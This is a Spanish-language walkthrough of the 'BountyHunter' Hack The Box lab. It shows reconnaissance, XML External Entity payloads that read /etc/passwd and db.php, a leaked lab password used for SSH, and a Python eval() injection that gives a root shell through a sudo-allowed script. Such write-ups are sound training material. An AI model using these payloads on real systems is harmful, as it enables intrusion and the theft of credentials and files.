# BountyHunter

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- XML External Entity (XXE)
- Sudo privilege
- Python eval() function

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.11.100`

```
Nmap scan report for 10.10.11.100
Host is up (0.075s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Enumerando el puerto 80 vemos algo interesante en el apartado **portal.php** que nos redirecciona a otro sitio llamado **log_submit.php**.

`http://10.10.11.100/portal.php`

![1](img/1.png)

`http://10.10.11.100/log_submit.php`

![2](img/2.png)

Utilizando gobuster encontramos diferentes directorios y archivos, entre los importantes **resources** y **db.php**.

`gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,dat -t 40`

![3](img/3.png)

Dentro de resources vemos unas notas.

`http://10.10.11.100/resources/README.txt`

![4](img/4.png)

### XML External Entity (XXE)

Enumerando un poco mas en la pagina **log_submit.php** se ve un script js que manda la informacion que ingresamos en el formulario como xml y lo imprime en la pagina.

![5](img/5.png)

![6](img/6.png)

El ataque mas comun que se puede probar con xml es usando **XML External Entity**. Utilizando la misma consola del navegador es posible probar este ataque.

```js
var xml = `<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe></cwe>
        <cvss></cvss>
        <reward></reward>
        </bugreport>`

let data = await returnSecret(btoa(xml));
$("#return").html(data)
```

Abrimos la consola del navegador y enviamos el script de arriba. Vemos que nos responde con el contenido del passwd y ahora sabemos que existe el usuario **development**.

![7](img/7.png)

Recordemos que existe el archivo **db.php** intentaremos traer el contenido con **php://** ya que con **file://** no regresa nada.

```js
var xml = `<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe></cwe>
        <cvss></cvss>
        <reward></reward>
        </bugreport>`

let data = await returnSecret(btoa(xml));
$("#return").html(data)
```

Mandamos el script y nos trae el contenido encodeado en base64.

![8](img/8.png)

Ahora decodeamos la cadena y vemos un password.

`echo '<string>' | base64 -d`

![9](img/9.png)

Lo podemos utilizar con el usuario **development** para conectarnos por SSH.

```
development : m19RoAU0hP41A1sTsq6K
```

`ssh development@10.10.11.100`

![10](img/10.png)

## Escalada de Privilegios

Vemos que tenemos privilegios sudo para ejecutar **ticketValidator.py**.

`sudo -l`

![11](img/11.png)

Revisando el script la vulnerabilidad se encuentra en la funcion **eval()** ya que esto nos permite obtener RCE.

![12](img/12.png)

Antes necesitamos validar varias condicionales:
- Crear un archivo con terminacion `.md`
- Primera linea del archivo `# Skytrain Inc`
- Segunda linea del archivo `## Ticket to`
- Tercera linea del archivo `__Ticket Code:__`
- Cuarta linea del archivo es donde ira nuestro payload

Para crear el payload tiene que empezar con `**` seguido de `num % 7 == 4`, seguido del simbolo `+` y cualquier numero. Despues de pasar esa condicional ponemos nuestro comando de python.

Podemos sacar algunos valores con python y utilizar cualquiera:

![13](img/13.png)

Juntando todo nos queda de la siguiente forma:

```md
# Skytrain Inc 
## Ticket to 
__Ticket Code:__
**4+0 and __import__('os').system('bash')
```

Probando el exploit en la maquina obtenemos una shell como root.

`sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py`

![14](img/14.png)

## Referencias
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection \
http://vipulchaskar.blogspot.com/2012/10/exploiting-eval-function-in-python.html